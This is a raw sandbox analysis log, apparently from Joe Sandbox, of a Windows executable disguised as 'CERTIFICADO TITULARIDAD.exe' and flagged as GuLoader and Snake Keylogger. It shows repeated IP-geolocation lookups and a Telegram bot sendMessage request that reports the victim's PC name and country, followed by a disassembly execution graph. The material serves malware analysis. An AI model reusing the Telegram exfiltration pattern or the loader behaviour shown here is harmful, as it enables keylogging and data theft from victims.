                                                                                                                        2024-11-11 14:28:17 UTC363INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a
                                                                                                                        Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        6192.168.2.649994188.114.96.34432308C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-11-11 14:28:18 UTC86OUTGET /xml/66.23.206.109 HTTP/1.1
                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-11-11 14:28:18 UTC852INHTTP/1.1 200 OK
                                                                                                                        Date: Mon, 11 Nov 2024 14:28:18 GMT
                                                                                                                        Content-Type: text/xml
                                                                                                                        Content-Length: 363
                                                                                                                        Connection: close
                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                        CF-Cache-Status: HIT
                                                                                                                        Age: 36681
                                                                                                                        Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ilkaIcfbxPsAp1rJg7Vk0yajyadI1pDaivDaQRY11DniYi6QdstMcskEJBseqQw720csL1mry4GCj6wzTGuoSVYZGDlBkH39kMU5iU%2FpeG1Wd5HS%2FQkH1X%2BOKceFKkn87d%2B92Ae9"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e0ef7cf79c419fb-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1487&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=700&delivery_rate=1994490&cwnd=251&unsent_bytes=0&cid=89ba1f6636e3f221&ts=117&x=0"
                                                                                                                        2024-11-11 14:28:18 UTC363INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a
                                                                                                                        Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        7192.168.2.649996188.114.96.34432308C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-11-11 14:28:19 UTC86OUTGET /xml/66.23.206.109 HTTP/1.1
                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-11-11 14:28:20 UTC848INHTTP/1.1 200 OK
                                                                                                                        Date: Mon, 11 Nov 2024 14:28:20 GMT
                                                                                                                        Content-Type: text/xml
                                                                                                                        Content-Length: 363
                                                                                                                        Connection: close
                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                        CF-Cache-Status: HIT
                                                                                                                        Age: 36683
                                                                                                                        Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qLVdPFbJgjHG0e%2BHFiT0DlfvKUC5dCuiNLPXTgGG6ccBpHtvnrZs1h6NBDK3bfpkb7hk9DeTIbkmZfFuADIFBoQDxvmykyXMHe%2Bry8jnEGUEPVrNmKnTk8C8sKQ02nCYsM8X5fGM"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e0ef7d92fa84310-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1277&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=700&delivery_rate=2326104&cwnd=251&unsent_bytes=0&cid=e8a61b8985e9ae86&ts=117&x=0"
                                                                                                                        2024-11-11 14:28:20 UTC363INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a
                                                                                                                        Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        8192.168.2.649998188.114.96.34432308C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-11-11 14:28:21 UTC62OUTGET /xml/66.23.206.109 HTTP/1.1
                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                        2024-11-11 14:28:21 UTC852INHTTP/1.1 200 OK
                                                                                                                        Date: Mon, 11 Nov 2024 14:28:21 GMT
                                                                                                                        Content-Type: text/xml
                                                                                                                        Content-Length: 363
                                                                                                                        Connection: close
                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                        CF-Cache-Status: HIT
                                                                                                                        Age: 36684
                                                                                                                        Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qGSumhIYJEQj2%2BKezBA2mEkZQZFf5rc%2BB3NTt7CWkgLXLVxSc4Zr%2BlnbZZzHPqBL0jWfn0ZRw%2BKQ5Zjgak9dXHJYVivMUdTORbf7qigp9OnpR7sQp5vouvSDDrxOemCh9ZnLHwM7"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e0ef7e13a49728d-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1589&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=700&delivery_rate=1811131&cwnd=245&unsent_bytes=0&cid=5e1dc4f8ca6aa1a0&ts=120&x=0"
                                                                                                                        2024-11-11 14:28:21 UTC363INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a
                                                                                                                        Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        9192.168.2.650000188.114.96.34432308C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-11-11 14:28:22 UTC86OUTGET /xml/66.23.206.109 HTTP/1.1
                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-11-11 14:28:22 UTC859INHTTP/1.1 200 OK
                                                                                                                        Date: Mon, 11 Nov 2024 14:28:22 GMT
                                                                                                                        Content-Type: text/xml
                                                                                                                        Content-Length: 363
                                                                                                                        Connection: close
                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                        CF-Cache-Status: HIT
                                                                                                                        Age: 36669
                                                                                                                        Last-Modified: Mon, 11 Nov 2024 04:17:13 GMT
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=el46R%2FJNrF%2FhgnSGBhg3bQo4%2FWYQbhTda3jZInT3ZEAzXUcw%2FrLfjUQHk6MKVIq%2BC9JgNfmwJoyyqTCflTWswK1uyUaOoQ8AIK3VikH8vogmRYOJYAdud%2B4A%2BNjfTIa8WOY6L3C%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e0ef7e9c92aa2ec-YUL
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11809&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=700&delivery_rate=246132&cwnd=32&unsent_bytes=0&cid=05b4349d01ac6b16&ts=137&x=0"
                                                                                                                        2024-11-11 14:28:22 UTC363INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a
                                                                                                                        Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        10192.168.2.650002188.114.96.34432308C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-11-11 14:28:24 UTC62OUTGET /xml/66.23.206.109 HTTP/1.1
                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                        2024-11-11 14:28:24 UTC856INHTTP/1.1 200 OK
                                                                                                                        Date: Mon, 11 Nov 2024 14:28:24 GMT
                                                                                                                        Content-Type: text/xml
                                                                                                                        Content-Length: 363
                                                                                                                        Connection: close
                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                        CF-Cache-Status: HIT
                                                                                                                        Age: 36687
                                                                                                                        Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mPGs64V00lZ12pVUmJAEMV8UGY6oxPKTavDrMlLT%2Bh46aw%2FbYslPVx8IdluqRv%2F1QeFNC0aJYlB3xjrQrjW2hyT%2BddsugDZXhBRMPK%2FsRdBPk%2FQ6I2SHLtjPp9wez5AM0OHDhS9O"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e0ef7f2bbf65e73-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1346&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=700&delivery_rate=1792079&cwnd=247&unsent_bytes=0&cid=26b1016ca1e23ed2&ts=119&x=0"
                                                                                                                        2024-11-11 14:28:24 UTC363INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a
                                                                                                                        Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        11192.168.2.650003149.154.167.2204432308C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-11-11 14:28:24 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20and%20Time:%2011/11/2024%20/%2023:31:24%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20302494%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                        Host: api.telegram.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-11-11 14:28:25 UTC344INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.18.0
                                                                                                                        Date: Mon, 11 Nov 2024 14:28:25 GMT
                                                                                                                        Content-Type: application/json
                                                                                                                        Content-Length: 55
                                                                                                                        Connection: close
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                        2024-11-11 14:28:25 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                        Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                        Click to jump to process

                                                                                                                        Click to jump to process

                                                                                                                        Click to dive into process behavior distribution

                                                                                                                        Click to jump to process

                                                                                                                        Target ID:0
                                                                                                                        Start time:09:26:58
                                                                                                                        Start date:11/11/2024
                                                                                                                        Path:C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe"
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:587'144 bytes
                                                                                                                        MD5 hash:597971BE325BBBA1DF725A7C101A4C58
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2622546717.0000000004C52000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:low
                                                                                                                        Has exited:true

                                                                                                                        Target ID:4
                                                                                                                        Start time:09:27:49
                                                                                                                        Start date:11/11/2024
                                                                                                                        Path:C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe"
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:587'144 bytes
                                                                                                                        MD5 hash:597971BE325BBBA1DF725A7C101A4C58
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3400640723.0000000037071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.3373397485.00000000017A2000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:low
                                                                                                                        Has exited:false

                                                                                                                        Reset < >

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:16.2%
                                                                                                                          Dynamic/Decrypted Code Coverage:13.5%
                                                                                                                          Signature Coverage:16.7%
                                                                                                                          Total number of Nodes:1603
                                                                                                                          Total number of Limit Nodes:43
                                                                                                                          execution_graph 5696 402643 5697 402672 5696->5697 5698 402657 5696->5698 5700 4026a2 5697->5700 5701 402677 5697->5701 5699 402d89 21 API calls 5698->5699 5709 40265e 5699->5709 5703 402dab 21 API calls 5700->5703 5702 402dab 21 API calls 5701->5702 5704 40267e 5702->5704 5705 4026a9 lstrlenW 5703->5705 5713 406543 WideCharToMultiByte 5704->5713 5705->5709 5707 402692 lstrlenA 5707->5709 5708 4026ec 5709->5708 5712 4026d6 5709->5712 5714 4060f2 SetFilePointer 5709->5714 5710 4060c3 WriteFile 5710->5708 5712->5708 5712->5710 5713->5707 5715 40610e 5714->5715 5722 406126 5714->5722 5716 406094 ReadFile 5715->5716 5717 40611a 5716->5717 5718 406157 SetFilePointer 5717->5718 5719 40612f SetFilePointer 5717->5719 5717->5722 5718->5722 5719->5718 5720 40613a 5719->5720 5721 4060c3 WriteFile 5720->5721 5721->5722 5722->5712 5884 73f71774 5885 73f717a3 5884->5885 5886 73f71bff 22 API calls 5885->5886 5887 73f717aa 5886->5887 5888 73f717b1 5887->5888 5889 73f717bd 5887->5889 5890 73f71312 2 API calls 5888->5890 5891 73f717c7 5889->5891 5892 73f717e4 5889->5892 5895 73f717bb 5890->5895 5896 73f715dd 3 API calls 5891->5896 5893 73f7180e 5892->5893 5894 73f717ea 5892->5894 5898 73f715dd 3 API calls 5893->5898 5897 73f71654 3 API calls 5894->5897 5899 73f717cc 5896->5899 5901 73f717ef 5897->5901 5898->5895 5900 73f71654 3 API calls 5899->5900 5902 73f717d2 5900->5902 5903 73f71312 2 API calls 5901->5903 5904 73f71312 2 API calls 5902->5904 5905 73f717f5 GlobalFree 5903->5905 5906 73f717d8 GlobalFree 5904->5906 5905->5895 5907 73f71809 GlobalFree 5905->5907 5906->5895 5907->5895 4929 401946 4930 401948 4929->4930 4931 402dab 21 API calls 4930->4931 4932 40194d 4931->4932 4935 405c2d 4932->4935 4974 405ef8 4935->4974 4938 405c55 DeleteFileW 4940 401956 4938->4940 4939 405c6c 4941 405d8c 4939->4941 4988 406521 lstrcpynW 4939->4988 4941->4940 4946 40687e 2 API calls 4941->4946 4943 405c92 4944 405ca5 4943->4944 4945 405c98 lstrcatW 4943->4945 4989 405e3c lstrlenW 4944->4989 4947 405cab 4945->4947 4950 405db1 4946->4950 4949 405cbb lstrcatW 4947->4949 4951 405cc6 lstrlenW FindFirstFileW 4947->4951 4949->4951 4950->4940 4952 405db5 4950->4952 4951->4941 4959 405ce8 4951->4959 5002 405df0 lstrlenW CharPrevW 4952->5002 4955 405d6f FindNextFileW 4955->4959 4960 405d85 FindClose 4955->4960 4956 405be5 5 API calls 4958 405dc7 4956->4958 4961 405de1 4958->4961 4962 405dcb 4958->4962 4959->4955 4968 405d30 4959->4968 4993 406521 lstrcpynW 4959->4993 4960->4941 4964 4055a6 28 API calls 4961->4964 4962->4940 4965 4055a6 28 API calls 4962->4965 4964->4940 4967 405dd8 4965->4967 4966 405c2d 64 API calls 4966->4968 4970 4062e1 40 API calls 4967->4970 4968->4955 4968->4966 4969 4055a6 28 API calls 4968->4969 4971 4055a6 28 API calls 4968->4971 4973 4062e1 40 API calls 4968->4973 4994 405be5 4968->4994 4969->4955 4972 405ddf 4970->4972 4971->4968 4972->4940 4973->4968 5005 406521 lstrcpynW 4974->5005 4976 405f09 5006 405e9b CharNextW CharNextW 4976->5006 4979 405c4d 4979->4938 4979->4939 4980 4067cf 5 API calls 4986 405f1f 4980->4986 4981 405f50 lstrlenW 4982 405f5b 4981->4982 4981->4986 4983 405df0 3 API calls 4982->4983 4985 405f60 GetFileAttributesW 4983->4985 4984 40687e 2 API calls 4984->4986 4985->4979 4986->4979 4986->4981 4986->4984 4987 405e3c 2 API calls 4986->4987 4987->4981 4988->4943 4990 405e4a 4989->4990 4991 405e50 CharPrevW 4990->4991 4992 405e5c 4990->4992 4991->4990 4991->4992 4992->4947 4993->4959 5012 405fec GetFileAttributesW 4994->5012 4997 405c12 4997->4968 4998 405c00 RemoveDirectoryW 5000 405c0e 4998->5000 4999 405c08 DeleteFileW 4999->5000 5000->4997 5001 405c1e SetFileAttributesW 5000->5001 5001->4997 5003 405dbb 5002->5003 5004 405e0c lstrcatW 5002->5004 5003->4956 5004->5003 5005->4976 5007 405eb8 5006->5007 5011 405eca 5006->5011 5009 405ec5 CharNextW 5007->5009 5007->5011 5008 405eee 5008->4979 5008->4980 5009->5008 5010 405e1d CharNextW 5010->5011 5011->5008 5011->5010 5013 405bf1 5012->5013 5014 405ffe SetFileAttributesW 5012->5014 5013->4997 5013->4998 5013->4999 5014->5013 5015 4015c6 5016 402dab 21 API calls 5015->5016 5017 4015cd 5016->5017 5018 405e9b 4 API calls 5017->5018 5030 4015d6 5018->5030 5019 401636 5021 401668 5019->5021 5022 40163b 5019->5022 5020 405e1d CharNextW 5020->5030 5024 401423 28 API calls 5021->5024 5023 401423 28 API calls 5022->5023 5025 401642 5023->5025 5032 401660 5024->5032 5040 406521 lstrcpynW 5025->5040 5029 40164f SetCurrentDirectoryW 5029->5032 5030->5019 5030->5020 5031 40161c GetFileAttributesW 5030->5031 5034 405aec 5030->5034 5037 405a75 CreateDirectoryW 5030->5037 5041 405acf CreateDirectoryW 5030->5041 5031->5030 5035 406915 5 API calls 5034->5035 5036 405af3 5035->5036 5036->5030 5038 405ac1 5037->5038 5039 405ac5 GetLastError 5037->5039 5038->5030 5039->5038 5040->5029 5042 405ae3 GetLastError 5041->5042 5043 405adf 5041->5043 5042->5043 5043->5030 5044 401c48 5045 402d89 21 API calls 5044->5045 5046 401c4f 5045->5046 5047 402d89 21 API calls 5046->5047 5048 401c5c 5047->5048 5049 401c71 5048->5049 5050 402dab 21 API calls 5048->5050 5051 401c81 5049->5051 5052 402dab 21 API calls 5049->5052 5050->5049 5053 401cd8 5051->5053 5054 401c8c 5051->5054 5052->5051 5055 402dab 21 API calls 5053->5055 5056 402d89 21 API calls 5054->5056 5057 401cdd 5055->5057 5058 401c91 5056->5058 5059 402dab 21 API calls 5057->5059 5060 402d89 21 API calls 5058->5060 5061 401ce6 FindWindowExW 5059->5061 5062 401c9d 5060->5062 5065 401d08 5061->5065 5063 401cc8 SendMessageW 5062->5063 5064 401caa SendMessageTimeoutW 5062->5064 5063->5065 5064->5065 5066 73f72a7f 5067 73f72acf 5066->5067 5068 73f72a8f VirtualProtect 5066->5068 5068->5067 5908 4028c9 5909 4028cf 5908->5909 5910 4028d7 FindClose 5909->5910 5911 402c2f 5909->5911 5910->5911 6021 40494a 6022 404980 6021->6022 6023 40495a 6021->6023 6025 404507 8 API calls 6022->6025 6024 4044a0 22 API calls 6023->6024 6026 404967 SetDlgItemTextW 6024->6026 6027 40498c 6025->6027 6026->6022 5073 4014cb 5074 4055a6 28 API calls 5073->5074 5075 4014d2 5074->5075 5912 73f71979 5913 73f7199c 5912->5913 5914 73f719d1 GlobalFree 5913->5914 5915 73f719e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5913->5915 5914->5915 5916 73f71312 2 API calls 5915->5916 5917 73f71b6e GlobalFree GlobalFree 5916->5917 5918 4016d1 5919 402dab 21 API calls 5918->5919 5920 4016d7 GetFullPathNameW 5919->5920 5921 4016f1 5920->5921 5927 401713 5920->5927 5924 40687e 2 API calls 5921->5924 5921->5927 5922 401728 GetShortPathNameW 5923 402c2f 5922->5923 5925 401703 5924->5925 5925->5927 